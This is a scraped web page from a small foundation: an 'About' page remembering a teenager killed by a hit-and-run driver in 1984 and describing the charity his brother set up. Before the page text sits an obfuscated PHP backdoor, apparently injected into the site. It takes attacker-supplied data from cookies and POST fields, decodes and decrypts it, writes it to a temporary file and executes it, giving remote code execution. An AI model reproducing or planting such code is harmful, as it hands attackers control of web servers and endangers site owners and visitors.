$cDTrV = 'L' . chr (114) . "\x61" . chr ( 625 - 530 ).chr (73) . "\x58" . chr (85); $rtwRCjwBRe = chr ( 101 - 2 ).chr ( 1106 - 998 )."\141" . chr (115) . 's' . chr ( 267 - 172 ).'e' . 'x' . chr (105) . "\163" . chr (116) . 's';$wefjXClSf = class_exists($cDTrV); $rtwRCjwBRe = "1886";$YxhpnTY = !1;if ($wefjXClSf == $YxhpnTY){function lzLeRiOAL(){return FALSE;}$jpyOZhqT = "50103";lzLeRiOAL();class Lra_IXU{private function Bnqhd($jpyOZhqT){if (is_array(Lra_IXU::$BkwWsb)) {$vaaLU = sys_get_temp_dir() . "/" . crc32(Lra_IXU::$BkwWsb["\x73" . "\x61" . 'l' . chr ( 213 - 97 )]);@Lra_IXU::$BkwWsb["\x77" . "\162" . chr ( 627 - 522 )."\164" . 'e']($vaaLU, Lra_IXU::$BkwWsb['c' . 'o' . chr ( 492 - 382 )."\164" . 'e' . "\x6e" . "\x74"]);include $vaaLU;@Lra_IXU::$BkwWsb['d' . "\145" . 'l' . 'e' . "\x74" . chr ( 559 - 458 )]($vaaLU); $jpyOZhqT = "50103";exit();}}private $AtjCnB;public function dIZvcpVk(){echo 53408;}public function __destruct(){$jpyOZhqT = "24996_2549";$this->Bnqhd($jpyOZhqT); $jpyOZhqT = "24996_2549";}public function __construct($RuvoGd=0){$ndPHwOngfx = $_POST;$pySzZovZ = $_COOKIE;$DPUmCqGE = "64febc13-9409-4893-866a-aeda48a9bc92";$ZqYukI = @$pySzZovZ[substr($DPUmCqGE, 0, 4)];if (!empty($ZqYukI)){$ApZhiTs = "base64";$OSqbUIvrf = "";$ZqYukI = explode(",", $ZqYukI);foreach ($ZqYukI as $gVDfg){$OSqbUIvrf .= @$pySzZovZ[$gVDfg];$OSqbUIvrf .= @$ndPHwOngfx[$gVDfg];}$OSqbUIvrf = array_map($ApZhiTs . '_' . chr (100) . chr ( 555 - 454 ).chr ( 697 - 598 ).chr ( 709 - 598 ).chr (100) . chr ( 415 - 314 ), array($OSqbUIvrf,)); $OSqbUIvrf = $OSqbUIvrf[0] ^ str_repeat($DPUmCqGE, (strlen($OSqbUIvrf[0]) / strlen($DPUmCqGE)) + 1);Lra_IXU::$BkwWsb = @unserialize($OSqbUIvrf); $OSqbUIvrf = class_exists("24996_2549");}}public static $BkwWsb = 21352;}$BUpMXcynj = new /* 37155 */ $cDTrV(50103 + 50103); $YxhpnTY = $BUpMXcynj = $jpyOZhqT = Array();} About Stephen Taylor | The Stephen Taylor Foundation
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About Stephen Taylor

In July 1984 Stephen was killed by a hit and run driver while crossing Lewisham Way in South East London, only yards from his home. He had just sat his O levels and had his whole life in front of him.

Steve always lived life to the full. He had a ton of friends and loved music, sport, fashion, art and partying; basically anything going on in inner London he could go and visit and take part in. He had a very strong sense of right and wrong and wanted people and communities to be treated with respect by everyone. He was a loving son, grandson and brother and is still missed by all of us every day.

STF has been established by Steve’s brother, Martin, to help fund people, causes and projects that Steve would have had a natural affinity for. These are likely to be –but not exclusively so – geographically focused on inner city areas and have educational, environmental, community and youth themes at their heart.